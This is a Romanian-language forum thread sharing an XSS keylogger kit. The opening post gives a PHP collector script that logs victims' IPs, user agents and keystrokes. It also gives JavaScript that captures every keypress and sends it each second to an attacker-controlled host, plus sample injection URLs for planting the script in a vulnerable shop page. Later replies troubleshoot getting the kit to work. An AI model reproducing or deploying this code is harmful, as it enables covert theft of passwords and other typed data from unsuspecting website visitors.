Jump to content
iulik

XSS keylogger

Recommended Posts

Posted

Ai nevoie de un host unde sa uploadezi:

g.php

<?php

$Keylog = $_GET["c"];

$reffer = $_SERVER['HTTP_REFERER'];

$ip = $_SERVER['REMOTE_ADDR'];

$date=date ("l dS of F Y h:i:s A");

$port = $_SERVER['REMOTE_PORT'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$file = fopen('data.txt', 'a');

fwrite($file, 'Ip: '.$ip."\n");

fwrite($file, 'Port: '.$port."\n");

fwrite($file, 'Refferer: '.$reffer."\n");

fwrite($file, 'User Agent: '.$user_agent."\n");

fwrite($file, 'Date: '.$date."\n");

fwrite($file, $Keylog."\n");

fwrite($file, "---------------------------\n\n");

fclose($file);

?>

k.js

<?php

var keys='';

document.onkeypress = function(e) {

get = window.event?event:e;

key = get.keyCode?get.keyCode:get.charCode;

key = String.fromCharCode(key);

keys+=key;

}

window.setInterval(function(){

new Image().src = 'http://yourhost.com/g.php?c='+keys;

keys = '';

}, 1000);

Facem un fisier txt sub numele data.txt si ii dam chmod 777

Exemplu de folosire:

http://...*.com/shop.php?article=12<script src="http://yourhost.com/k.js"></script>
http://...*.com/shop.php?article=12<script language="JavaScript" src="http://yourhost.com/k.js"></script>
Posted

nu functioneaza. am mai incercat si in alt mod sa afisez cu javascript un cod php insa functioneaza doar daca codul php se afla in pagina respectiva, daca se afla intr-un fisier separat si e inclus cu <script src=""></script> nu mai functioneaza. se pare ca e o masura de protectie a serverului insa nu stiu daca merge dezactivata.

Posted
nu functioneaza. am mai incercat si in alt mod sa afisez cu javascript un cod php insa functioneaza doar daca codul php se afla in pagina respectiva, daca se afla intr-un fisier separat si e inclus cu <script src=""></script> nu mai functioneaza. se pare ca e o masura de protectie a serverului insa nu stiu daca merge dezactivata.

Poate ai sarit linia asta:

new Image().src = 'http://yourhost.com/g.php?c='+keys;

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...